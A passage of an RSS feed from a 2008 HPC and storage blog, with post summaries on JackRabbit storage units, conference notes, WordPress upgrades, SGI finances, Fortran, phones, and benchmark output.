      <link>https://blog.scalability.org/2008/05/jackrabbit-updates/</link>
      <pubDate>Mon, 05 May 2008 01:54:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/05/jackrabbit-updates/</guid>
      <description>A number of new things happening on the JackRabbit front. First, 2 new models: the deskside unit with 15 drive bays, and the JackRabbit-M (JRM) unit with 24 drive bays. The deskside is targeted at groups running calculations on their desktops or small clusters, that need a local high performance low cost storage resource. The JRM unit is midrange between the JRS and the JR, with 12-24 TB raw capacity, and 1 to 2 RAID cards.</description>
    </item>
    
    <item>
      <title>more from BioIT World Expo in Boston</title>
      <link>https://blog.scalability.org/2008/04/more-from-bioit-world-expo-in-boston/</link>
      <pubDate>Wed, 30 Apr 2008 03:06:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/more-from-bioit-world-expo-in-boston/</guid>
      <description>Long day, spent most of it talking to people and groups. This is a small conference, attendance is ok, not heavy, not light. Saw lots of people I know/knew. Some I met today. Met Deepak from BBGM in person, and a number of people I have conversed with in the past through email/phone. Saw a few old colleagues. On the exhibits/discussions &amp;hellip; some memes I see floating about, and have been hearing for a while.</description>
    </item>
    
    <item>
      <title>BioIT World 2008</title>
      <link>https://blog.scalability.org/2008/04/bioit-world-2008/</link>
      <pubDate>Tue, 29 Apr 2008 18:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/bioit-world-2008/</guid>
      <description>Short &amp;hellip; From blackberry. A number of people have noted what we have been observing, that life science users don&amp;rsquo;t want to pay for performance. Business models predicated upon higher price for perceived value of being faster won&amp;rsquo;t fly well. Similarly there is even more interest in storage.</description>
    </item>
    
    <item>
      <title>ok, the automatic update is kinda strange ... but it works</title>
      <link>https://blog.scalability.org/2008/04/ok-the-automatic-update-is-kinda-strange-but-it-works/</link>
      <pubDate>Sun, 27 Apr 2008 01:21:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/ok-the-automatic-update-is-kinda-strange-but-it-works/</guid>
      <description>20-30 mouse clicks, and I went from 2.5 to 2.5.1. There is a bug in the wizard, will file it later on. but &amp;hellip; it works. Easily. BTW: if you haven&amp;rsquo;t got the news, update your Wordpress 2.5 to 2.5.1 &amp;hellip; Now. As in immediately. Some sort of bad bug with live exploit apparently in the wild.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, oh earnings ...</title>
      <link>https://blog.scalability.org/2008/04/wherefore-art-thou-oh-earnings/</link>
      <pubDate>Fri, 25 Apr 2008 00:06:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/wherefore-art-thou-oh-earnings/</guid>
      <description>I had expected Microsoft to announce another record quarter after Intel announced their results. The two usually go hand in hand. Well, it turns out that Microsoft did not do as well as anticipated. Nor did Intel.
Not that there is anything wrong with Microsoft&#39;s $4.39B earnings on revenue of $14.3B. Nothing at all. Very good revenue. We would like something like this at our day job. Maybe sell 1.4M JackRabbits.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, open source Solaris community?</title>
      <link>https://blog.scalability.org/2008/04/wherefore-art-thou-open-source-solaris-community/</link>
      <pubDate>Thu, 24 Apr 2008 21:39:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/wherefore-art-thou-open-source-solaris-community/</guid>
      <description>Ted T&amp;rsquo;so did a good job of analyzing the current poor state of open source solaris as a community. He points to a number of community building and engineering failures (such as building a mercurial repository &amp;hellip; really it is easy). He points to the marketing and business case issues. On a humorous note, he points to the response of a Solaris engineer to posts by David Miller on why Linux outperforms Solaris on some microbenchmarks.</description>
    </item>
    
    <item>
      <title>Liveleak and platform dependence</title>
      <link>https://blog.scalability.org/2008/04/liveleak-and-platform-dependence/</link>
      <pubDate>Thu, 24 Apr 2008 12:33:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/liveleak-and-platform-dependence/</guid>
      <description>[updated] Liveleak staff support proved to be quite helpful. The issue may be less of a platform dependence as I had presumed, and more of a flash and (format/video) coding issue. [update 2] Looks like it may have been a problem in the player for flash8 video. They fixed it, within about 3 hours of my reporting it. That is the sort of service we like to deliver to our customers.</description>
    </item>
    
    <item>
      <title>Interesting ...</title>
      <link>https://blog.scalability.org/2008/04/interesting/</link>
      <pubDate>Wed, 23 Apr 2008 20:54:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/interesting/</guid>
      <description>At Storagemojo, Robin Harris has an interesting take on the evolution of storage systems.
This is interesting to us, given how much bandwidth we can provide from our JackRabbit storage systems. The issue for us is finding the right protocol to pull 750 MB/s per small unit, and distribute this to consumers of the data.</description>
    </item>
    
    <item>
      <title>Yeah, ok ... whatever</title>
      <link>https://blog.scalability.org/2008/04/yeah-ok-whatever/</link>
      <pubDate>Mon, 21 Apr 2008 22:25:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yeah-ok-whatever/</guid>
      <description>So I checked logs. Like I always do, to make sure things aren&amp;rsquo;t broken. Since yesterday, someone from Italy, specifically IP address 84.220.89.155 has been attacking our infrastructure. Their attack was a DoS. Try to bog our servers down way past the point that they could respond. They were not successful. Their ISP has been notified. Hopefully they will take action. I wonder if we need to start considering DRDOS &amp;hellip; Distributed Response to DoS.</description>
    </item>
    
    <item>
      <title>new (old) spammer tactic?</title>
      <link>https://blog.scalability.org/2008/04/new-old-spammer-tactic/</link>
      <pubDate>Mon, 21 Apr 2008 15:42:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/new-old-spammer-tactic/</guid>
      <description>Been getting quite a few mails of a bounce/spam rejection from external mailers. Turns out someone is using my day job email with random spam mail. Some sort of filter poisoning? Prevent our mails from getting to others? Obviously this must have an economic connection. But this is so specific, the only &amp;ldquo;logical&amp;rdquo; connections I can think up require donning a tin foil hat &amp;hellip;</description>
    </item>
    
    <item>
      <title>Article on MPI in 30 minutes ...</title>
      <link>https://blog.scalability.org/2008/04/article-on-mpi-in-30-minutes/</link>
      <pubDate>Sat, 19 Apr 2008 00:22:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/article-on-mpi-in-30-minutes/</guid>
      <description>is up at Linux Magazine. See here for more details. First: There are formatting errors, and a few spelling errors. This is a problem; I will construct an errata list and send them a link. Second: I am told it is also in print form. And it is &amp;ldquo;severely edited for space at the expense of correctness&amp;rdquo; (how&amp;rsquo;s that for a euphemism) relative to the online form. I haven&amp;rsquo;t seen the print version yet, will go buy the mag tomorrow.</description>
    </item>
    
    <item>
      <title>Some interesting tidbits ...</title>
      <link>https://blog.scalability.org/2008/04/some-interesting-tidbits/</link>
      <pubDate>Fri, 18 Apr 2008 16:04:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/some-interesting-tidbits/</guid>
      <description>A server reliability report is out, comparing OSes and machines. Had a few surprises in it. They did note that Redhat and others had good uptime.
[spam@scalableinformatics.com:~] 1 &amp;gt;uptime
 11:43:37 up 462 days, 21:23, 11 users, load average: 0.25, 0.20, 0.31
[spam@scalableinformatics.com:~] 2 &amp;gt;cat /etc/redhat-release
CentOS release 4.3 (Final)
that email is a real email address, and yes, if a spammer sends to it, our spam filtering will get better &amp;hellip;</description>
    </item>
    
    <item>
      <title>yes and no</title>
      <link>https://blog.scalability.org/2008/04/yes-and-no/</link>
      <pubDate>Fri, 18 Apr 2008 00:11:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yes-and-no/</guid>
      <description>Yes, we were knocked off the air for a bit today. No, it was not from load, hackers, etc. It was from a successful php upgrade. A long overdue one. You may have noticed the fancy coloration. Really, this happened automagically. I didn&amp;rsquo;t do it &amp;hellip; I swear! The issue was an errant plugin, that happened to die in a specific corner case. That got tripped. And stayed tripped. A quick &amp;ldquo;mv&amp;rdquo; saved the day.</description>
    </item>
    
    <item>
      <title>Cloud computing for HPC</title>
      <link>https://blog.scalability.org/2008/04/cloud-computing-for-hpc/</link>
      <pubDate>Wed, 16 Apr 2008 14:52:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/cloud-computing-for-hpc/</guid>
      <description>John West of Inside HPC wrote a great response to my response to Deepak of BBGM. My arguments were that to enable cloud computing to work economically, one has to consider all of the costs (infrastructure, pipes, computing, people, &amp;hellip;). John&amp;rsquo;s response was that yes, and sometimes you need an act of congress to get even moderate-sized infrastructure. I probably need to clarify my thoughts. I am a firm believer that this sort of computing will likely happen.</description>
    </item>
    
    <item>
      <title>What is going on with SGI?</title>
      <link>https://blog.scalability.org/2008/04/what-is-going-on-with-sgi/</link>
      <pubDate>Wed, 16 Apr 2008 14:51:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/what-is-going-on-with-sgi/</guid>
      <description>We are hearing about SGI wins on HPCwire and other venues. These should be good, and reflected in the stock price.
[SGIC 2-year chart](http://ichart.finance.yahoo.com/z?s=SGIC&amp;amp;t=2y&amp;amp;q=l&amp;amp;l=on&amp;amp;z=l&amp;amp;p=s&amp;amp;a=v&amp;amp;p=s)
But they aren&amp;rsquo;t. SGI&amp;rsquo;s market cap is 90.6M as of this morning, with 1500+ employees. Trailing 12 month revenue is 415M. They have 85M of debt. About 33.2M in cash. Something has got to give here. As they stopped making their own stuff, COGS increased, as their suppliers made more margin off completed product.</description>
    </item>
    
    <item>
      <title>Our anti-comment spam filter was targetted last night</title>
      <link>https://blog.scalability.org/2008/04/our-anti-comment-spam-filter-was-targetted-last-night/</link>
      <pubDate>Tue, 15 Apr 2008 13:20:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/our-anti-comment-spam-filter-was-targetted-last-night/</guid>
      <description>Apparently someone out there really doesn&amp;rsquo;t like how effective the anti-spam effort was. Go figure. Update: Well looks like we weren&amp;rsquo;t the only one. The SK2 RBL was knocked offline. Fixed the problem on our end, looks like someone tested the scalability of the RBL back end.</description>
    </item>
    
    <item>
      <title>Replaced networkmanager with wicd on my laptop</title>
      <link>https://blog.scalability.org/2008/04/replaced-networkmanager-with-wicd-on-my-laptop/</link>
      <pubDate>Tue, 15 Apr 2008 03:56:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/replaced-networkmanager-with-wicd-on-my-laptop/</guid>
      <description>Wow&amp;hellip; what a difference. I am typing this on my laptop after firing up wireless with our WPA2 key. Through a nice simple panel. Wireless has not worked this easily in Linux since &amp;hellip; well &amp;hellip; ever. I used to think wireless in windows was easy, though some of the connection managers are annoying. This connected right away, no problems. Showed me which access points were available. Allowed me to set up auto detection profiles.</description>
    </item>
    
    <item>
      <title>An interesting bit on IT shops ...</title>
      <link>https://blog.scalability.org/2008/04/an-interesting-bit-on-it-shops/</link>
      <pubDate>Sun, 13 Apr 2008 17:18:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/an-interesting-bit-on-it-shops/</guid>
      <description>From /., they linked to this blog post.
Interesting take. What I note is that like all infrastructure, IT is viewed as a cost center, and is often relegated to cost minimization practices. Sometimes these are a good thing. Sometimes they are a very bad thing. Real talent costs money. To a very large extent, you get what you pay for. Getting competent generalist people from a low cost body shop is possible, though more than a few of them may be paper MCSEs.</description>
    </item>
    
    <item>
      <title>Good article, with tangential relevance to HPC</title>
      <link>https://blog.scalability.org/2008/04/good-article-with-tangential-relevance-to-hpc/</link>
      <pubDate>Sat, 12 Apr 2008 16:12:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/good-article-with-tangential-relevance-to-hpc/</guid>
      <description>This was linked from Drudge or one of the other sites. Some of the article&amp;rsquo;s writing is a bit on the biased side, and there are some things I don&amp;rsquo;t quite agree with. However, the thrust of the article (ignoring the title and other elements) is summarized in the last few paragraphs.
Yes. Absolutely. You sink, or you swim. In HPC, the markets are growing rapidly. And they are shifting rapidly.</description>
    </item>
    
    <item>
      <title>that they are addressing this publicly speaks volumes ...</title>
      <link>https://blog.scalability.org/2008/04/that-they-are-addressing-this-publicly-speaks-volumes/</link>
      <pubDate>Sat, 12 Apr 2008 15:10:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/that-they-are-addressing-this-publicly-speaks-volumes/</guid>
      <description>&amp;hellip; it means that they have to. That many others have asked. That this is a concern. Specifically I am talking about the MySQL acquisition by Sun. The article talking with the current VP of DB (former CEO of MySQL AB) is attempting to put to rest these fears. Unfortunately, the headline/title is designed to inject conflict.
The title of this bit is &amp;ldquo;Mickos, As New Sun Exec: Linux Will Stay In LAMP&amp;rdquo; This looks like an attempt by the author or editorial staff to inject controversy.</description>
    </item>
    
    <item>
      <title>...  and it is all so obvious to me now ...</title>
      <link>https://blog.scalability.org/2008/04/and-it-is-all-so-obvious-to-me-now/</link>
      <pubDate>Fri, 11 Apr 2008 21:17:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/and-it-is-all-so-obvious-to-me-now/</guid>
      <description>Yeah. 1 day with a Blackberry 8830. One day. That&amp;rsquo;s all I needed. I am sold. Best phone/device I have used. The Nokia E61 was close, but it didn&amp;rsquo;t work in the US on a 3G network. Palm Treo was good, but had too many issues. The Windows handhelds are, well, not quite there. Windows Mobile 6 is a huge improvement over Windows Mobile 5. That said, WM6 is IMO significantly behind BlackBerry on usability and performance.</description>
    </item>
    
    <item>
      <title>I am now part of the collective ...</title>
      <link>https://blog.scalability.org/2008/04/i-am-now-part-of-the-collective/</link>
      <pubDate>Fri, 11 Apr 2008 04:15:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/i-am-now-part-of-the-collective/</guid>
      <description>Yes, I got a BlackBerry. I had the Verizon xv6800 phone as a replacement for the abominable Motorola Q, which replaced a Treo 650. The Treo was ok, 2.5 day battery life with reasonable usage. It just rebooted and crashed at random. Went through 4 hand sets. The Q was terrible. Absolutely horrible. The 18 hour battery life was annoying. I thought the xv6800 would be better. Well, I was half right.</description>
    </item>
    
    <item>
      <title>knock knock knocking on petaflops door ...</title>
      <link>https://blog.scalability.org/2008/04/knock-knock-knocking-on-petaflops-door/</link>
      <pubDate>Thu, 10 Apr 2008 04:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/knock-knock-knocking-on-petaflops-door/</guid>
      <description>This article on HPCwire was a bit of an inspiration &amp;hellip; (with apologies to Bob Dylan, and Guns and Roses) Mama take this cluster from me I can&amp;rsquo;t run on it anymore It&amp;rsquo;s getting slow too slow for me Feels like I&amp;rsquo;m knockin&#39; on petaflops door
Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Mama take my single cores from the rack I can&amp;rsquo;t run on them anymore That cold data center air is comin&#39; down Feels like I&amp;rsquo;m knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door Knock-knock-knockin&#39; on petaflops door &amp;hellip; ok, I&amp;rsquo;ll keep my day job.</description>
    </item>
    
    <item>
      <title>old_stuff&#43;&#43;</title>
      <link>https://blog.scalability.org/2008/04/old_stuff/</link>
      <pubDate>Wed, 09 Apr 2008 20:48:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/old_stuff/</guid>
      <description>Ok &amp;hellip; a nice article on HPC startup issues (really IT startup issues) at insidehpc. This is a good article. Makes the point that people are willing to spend on incremental change, and that revolutionary change requires a serious investment from (multiple) big players. There are other reasons I like this article, but I won&amp;rsquo;t go into those here. The point that Christopher makes is spot on. Exactly right. Innovation needs to make things simply drop in and work, with as little pain as possible.</description>
    </item>
    
    <item>
      <title>Gonna need to play with W2k8 at some point ...</title>
      <link>https://blog.scalability.org/2008/04/gonna-need-to-play-with-w2k8-at-some-point/</link>
      <pubDate>Wed, 09 Apr 2008 20:09:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/gonna-need-to-play-with-w2k8-at-some-point/</guid>
      <description>I want to play with SUA and see how it fares against Cygwin. This is an issue for previous versions of Windows &amp;hellip; SUA isn&amp;rsquo;t available, or SFU is intrusive (I won&amp;rsquo;t install it on my laptop due to all the things it wants to touch). This arose from conversations in the day job yesterday. Still have to pull down W2k8 to see if we can run it on JackRabbit. I want to get real builds of code going so that we can see if there is any advantage to running in SUA vs Cygwin.</description>
    </item>
    
    <item>
      <title>In search of meaningful benchmarks</title>
      <link>https://blog.scalability.org/2008/04/in-search-of-meaningful-benchmarks/</link>
      <pubDate>Wed, 09 Apr 2008 00:51:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/in-search-of-meaningful-benchmarks/</guid>
      <description>Well, mostly I am interested in video/media streaming, real financial analytical/data-flow benchmarks (everyone does Black-Scholes, but is this the most meaningful benchmark to do?), and things from our friends in the petroleum industry. We want to put our JackRabbit storage systems to the test(s) as it were. One can run IOzone and bonnie++ so many times &amp;hellip;</description>
    </item>
    
    <item>
      <title>So how do you ...</title>
      <link>https://blog.scalability.org/2008/04/so-how-do-you/</link>
      <pubDate>Tue, 08 Apr 2008 04:26:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/so-how-do-you/</guid>
      <description>&amp;hellip; convince your cluster users not to run as root user? Yet another story for beer-time. Any advice out there on how to explain how bad (really really bad) of an idea this is? I have tried, but they seem to not make the connection between this and spurious failures of jobs. Testing the system as a normal user shows it runs fine. There is a joke this reminds me of.</description>
    </item>
    
    <item>
      <title>COTS supercomputing a danger?</title>
      <link>https://blog.scalability.org/2008/04/cots-supercomputing-a-danger/</link>
      <pubDate>Mon, 07 Apr 2008 14:44:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/cots-supercomputing-a-danger/</guid>
      <description>An article on HPCwire suggests that we live in dangerous times. Specifically
hmmm &amp;hellip;
We have limited choices due to economics and market evolution. Way back when RISC was still hot, many people ignored those pesky CISC machines coming up. When those pesky CISC machines started putting down benchmarks of 0.25-1.25 of the performance of the RISC machines, at 1/10th their cost, people started to take serious interest in using them.</description>
    </item>
    
    <item>
      <title>&#34;The Grid&#34;(TM) (with extra hype, no information content ...)</title>
      <link>https://blog.scalability.org/2008/04/the-gridtm-with-extra-hype-no-information-content/</link>
      <pubDate>Mon, 07 Apr 2008 12:21:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/the-gridtm-with-extra-hype-no-information-content/</guid>
      <description>I read an &amp;ldquo;amusing&amp;rdquo; piece this past weekend, where people connected with the LHC project at CERN talked about how they would do data distribution and computation. Basically they are building their own data network, and doing some interesting bits with large volume data caching/distribution.
Ok. Then we get this. You know, the &amp;ldquo;Grid&amp;rdquo; will make the internet obsolete. Oh bother. Let me ask a simple question of said media outlets.</description>
    </item>
    
    <item>
      <title>Yup ... what she said ...</title>
      <link>https://blog.scalability.org/2008/04/yup-what-she-said/</link>
      <pubDate>Mon, 07 Apr 2008 01:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yup-what-she-said/</guid>
      <description>In a good Freep article today, Katherine Yung described some of the dilemmas surrounding raising capital in the state of Michigan.
Unfortunately for the state, the political echelon is targeting &amp;ldquo;advanced manufacturing&amp;rdquo;, as a priority, among several others.
Later on Ms. Yung notes:
Well, there is truth to that. But 2 years ago, during the initial 21st century fund effort, 700+ entrants applied for funds. Probably close to 400 companies. Quite a few would be called startups.</description>
    </item>
    
    <item>
      <title>Free advice for entrepreneurs ...</title>
      <link>https://blog.scalability.org/2008/04/free-advise-for-entrepreneurs/</link>
      <pubDate>Mon, 07 Apr 2008 00:31:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/free-advise-for-entrepreneurs/</guid>
      <description>Not legal advice, go speak with a lawyer if you want that. And understand that they have a vested interest in an alternative position to what I say below. When forming a startup, do not, unless you are a glutton for punishment, use an LLC structure, and run as far away, as rapidly as possible, from people who suggest you should use it. Lawyers love LLCs as you have to keep coming back to them for any change.</description>
    </item>
    
    <item>
      <title>yeah ... well ... ok</title>
      <link>https://blog.scalability.org/2008/04/yeah-well-ok/</link>
      <pubDate>Fri, 04 Apr 2008 04:44:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/yeah-well-ok/</guid>
      <description>page counter is broken. I put in StatPress. 1800 page visits yesterday (started at 10am) 2218 page visits as of midnight. Sheesh. This matches the logs and the post-read counts at the bottom. If you ask me, I do not have a clue as to what the page count is counting. So I am going to remove it soon from the right sidebar. What I can tell is, it is about 1 order of magnitude off.</description>
    </item>
    
    <item>
      <title>hrmmm ...</title>
      <link>https://blog.scalability.org/2008/04/hrmmm/</link>
      <pubDate>Wed, 02 Apr 2008 23:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/hrmmm/</guid>
      <description>So we have this counter plugin. And it counts slowly. I am not sure why. Looking over our logs, it seems that we have quite a bit of activity, though looking at the counter, it doesn&amp;rsquo;t look like it. So, I installed StatPress. Since 10am this morning (7pm now) we have had over 1000 visits. Yet the counter plugin reports barely 150 visits. These 1000 visits are about 1/2 RSS feeds, page views, and related.</description>
    </item>
    
    <item>
      <title>Confirmation on T&amp;C issue</title>
      <link>https://blog.scalability.org/2008/04/confirmation-on-tc-issue/</link>
      <pubDate>Wed, 02 Apr 2008 14:59:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/confirmation-on-tc-issue/</guid>
      <description>I had previously noted that some T&amp;amp;C;&amp;rsquo;s we run into are, well, not fit for company consumption. This isn&amp;rsquo;t the only aspect of the HPC market &amp;hellip; clusters as commodities and other related phenomena lead to extremely thin margins. As Doug at Lead Follow or &amp;hellip; notes in one of his posts on comments from an Intel person :
Yes Doug, I do. We walked away from a particularly onerous set of T&amp;amp;C.</description>
    </item>
    
    <item>
      <title>Speaking about LNXI (and SGI) ...</title>
      <link>https://blog.scalability.org/2008/04/speaking-about-lnxi-and-sgi/</link>
      <pubDate>Wed, 02 Apr 2008 14:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/speaking-about-lnxi-and-sgi/</guid>
      <description>John at InsideHPC blog has a brief writeup on an article I refrained from commenting on a few days ago. In John&amp;rsquo;s writeup, he (sarcastically) notes that going private didn&amp;rsquo;t help LNXI. Last I remember, LNXI was never public, they wanted it to be, but I don&amp;rsquo;t think they ever hit an IPO. That said, John&amp;rsquo;s writeup excerpts some of the AP article, with brief comments. My comments on the article are, basically, what took the investors so long?</description>
    </item>
    
    <item>
      <title>A subject touched on with the LNXI discussions</title>
      <link>https://blog.scalability.org/2008/04/a-subject-touched-on-with-the-lnxi-discussions/</link>
      <pubDate>Tue, 01 Apr 2008 19:49:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/a-subject-touched-on-with-the-lnxi-discussions/</guid>
      <description>I had talked briefly about terms and conditions of bids. We strive in the day job, to make sure ours are, shocking as it may be, reasonable. That is, they are not onerous, we don&amp;rsquo;t put thumbscrews to our customers, we simply ask them to pay on time or pay late fees, and agree to specific things that prevent misunderstandings in the future. We have it in our heads that somehow angering customers is a Bad Thing™. This said, you should see some of the RFP T&amp;amp;C; we are asked to agree to.</description>
    </item>
    
    <item>
      <title>Hola Barcelona!</title>
      <link>https://blog.scalability.org/2008/04/hola-barcelona/</link>
      <pubDate>Tue, 01 Apr 2008 14:14:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/04/hola-barcelona/</guid>
      <description>Rumor has it, on or about 4-April, we should be seeing some new chips. Will try to confirm.</description>
    </item>
    
    <item>
      <title>Site upgraded ... WP2.5</title>
      <link>https://blog.scalability.org/2008/03/site-upgraded-wp25/</link>
      <pubDate>Mon, 31 Mar 2008 01:12:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/site-upgraded-wp25/</guid>
      <description>This was, by far, the most painless upgrade of a complex software system I have ever done. That said, I don&amp;rsquo;t have a coverage test running to make sure everything is working, so please, by all means, kick the tires, make sure it all works.</description>
    </item>
    
    <item>
      <title>The silicon chip is falling, the silicon chip is falling ...</title>
      <link>https://blog.scalability.org/2008/03/the-silicon-chip-is-falling-the-silicon-chip-is-falling/</link>
      <pubDate>Fri, 28 Mar 2008 14:02:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/the-silicon-chip-is-falling-the-silicon-chip-is-falling/</guid>
      <description>on /. there is a link to a story on the imminent death of silicon semiconductor as a basis for computing. quoting &amp;hellip;
These predictions have a history of being wrong. This is not to say that silicon will go on forever. It is an indirect bandgap semiconductor which dissipates some energy as phonons (sound/heat waves in the material; think of hitting an iron bar, and the tones it makes &amp;hellip; that&amp;rsquo;s energy you imparted as sound/heat in the material).</description>
    </item>
    
    <item>
      <title>Need to understand the SGI RASC BLAST benchmark</title>
      <link>https://blog.scalability.org/2008/03/need-to-understand-the-sgi-rasc-blast-benchmark/</link>
      <pubDate>Fri, 28 Mar 2008 06:04:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/need-to-understand-the-sgi-rasc-blast-benchmark/</guid>
      <description>Way back when, we developed a little scalable app called CT-BLAST, that ran BLAST in parallel on clusters. I had been thinking about re-doing this outside SGI when I first learned of MPI-BLAST some years ago. Since then many folks have tried accelerating BLAST. They do this because BLAST consumes so many cycles. Sadly, BLAST doesn&amp;rsquo;t seem to drive purchases &amp;hellip; That said, some people continue to target this as a core market.</description>
    </item>
    
    <item>
      <title>... and we have a winner ...</title>
      <link>https://blog.scalability.org/2008/03/and-we-have-a-winner/</link>
      <pubDate>Fri, 28 Mar 2008 01:21:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-we-have-a-winner/</guid>
      <description>Way way back, long long ago, I used mdbnch benchmark to test machines. I was amazed when SGI&amp;rsquo;s R8k got this done in under 20 seconds. The sub 15 second R10/R12k results were awesome. The sub 10 second Alpha results were amazing. That was about a decade ago. For a while, Opterons and Xeons have been in the 2-3 second range. Some recent chips were in the 1.4 second range. I always wondered when we would crack one second.</description>
    </item>
    
    <item>
      <title>A definition of funny ... or when context sensitive adverts are not appropriate ...</title>
      <link>https://blog.scalability.org/2008/03/a-definition-of-funny-or-when-context-sensitive-adverts-are-not-appropriate/</link>
      <pubDate>Mon, 24 Mar 2008 14:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/a-definition-of-funny-or-when-context-sensitive-adverts-are-not-appropriate/</guid>
      <description>Working through my Gmail account, cleaning things up (monday habit), I get over to the spam box. I don&amp;rsquo;t like spam. Not too many people I know like spam. That&amp;rsquo;s spam the mail, not spam the meat. This is important. So I blow away all the spam. And what should appear in the context sensitive advertising above the main text area (tastefully sized, unlike Yahoo mail where the advert is most of the page &amp;hellip; cough cough &amp;hellip;) but &amp;hellip;</description>
    </item>
    
    <item>
      <title>Why we (still) need Fortran, and why this won&#39;t change</title>
      <link>https://blog.scalability.org/2008/03/why-we-still-need-fortran-and-why-this-wont-change/</link>
      <pubDate>Sun, 23 Mar 2008 20:10:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/why-we-still-need-fortran-and-why-this-wont-change/</guid>
      <description>I saw a link to an article from /. on Wodehouse&amp;rsquo;s ideas in writing prose used for refactoring code. For those not in the know, code refactoring is the process of rewriting a code to be simpler, or more efficient, more expressive of the needs. What has this to do with Fortran, and in the bigger picture, HPC? Everything.
Fortran has not been in vogue in CS departments in this century, nor for the latter portion of the past century.</description>
    </item>
    
    <item>
      <title>Exciting news</title>
      <link>https://blog.scalability.org/2008/03/exciting-news/</link>
      <pubDate>Tue, 18 Mar 2008 16:16:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/exciting-news/</guid>
      <description>Well, you may have heard it already from other sources, but Scalable Informatics is now working with Wipro Technologies to provide high performance computing services, development, and support. We are quite excited by this, and in speaking to our current customers, we are getting good positive responses on this development. More later.</description>
    </item>
    
    <item>
      <title>higher than average velocity these days ...</title>
      <link>https://blog.scalability.org/2008/03/higher-than-average-velocity-these-days/</link>
      <pubDate>Tue, 18 Mar 2008 16:10:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/higher-than-average-velocity-these-days/</guid>
      <description>&amp;hellip; been on 2 sets of airplanes in last 96 hours, will be on another tomorrow. Sorry about the posting delays &amp;hellip;</description>
    </item>
    
    <item>
      <title>... and 8 simultaneous buffered threads with 32 GB of files over  iSCSI</title>
      <link>https://blog.scalability.org/2008/03/and-8-simultaneous-buffered-threads-with-32-gb-of-files-over-iscsi/</link>
      <pubDate>Wed, 12 Mar 2008 07:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-8-simultaneous-buffered-threads-with-32-gb-of-files-over-iscsi/</guid>
      <description>root@jrs8:/home/scalable/io-bm# mpirun -np 8 ./io-bm.exe -n 32 -f /big/file -w [tid=0] each thread will output 4.000 gigabytes [tid=0] using buffered IO [tid=2] each thread will output 4.000 gigabytes [tid=0] page size ... 4096 bytes [tid=0] number of elements per buffer ... 2097152 [tid=5] each thread will output 4.000 gigabytes [tid=5] using buffered IO [tid=5] page size ... 4096 bytes [tid=2] using buffered IO [tid=2] page size ... 4096 bytes [tid=3] each thread will output 4.</description>
    </item>
    
    <item>
      <title>... and some bonnie&#43;&#43; numbers for same unit</title>
      <link>https://blog.scalability.org/2008/03/and-some-bonnie-numbers-for-same-unit/</link>
      <pubDate>Wed, 12 Mar 2008 07:01:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/03/and-some-bonnie-numbers-for-same-unit/</guid>
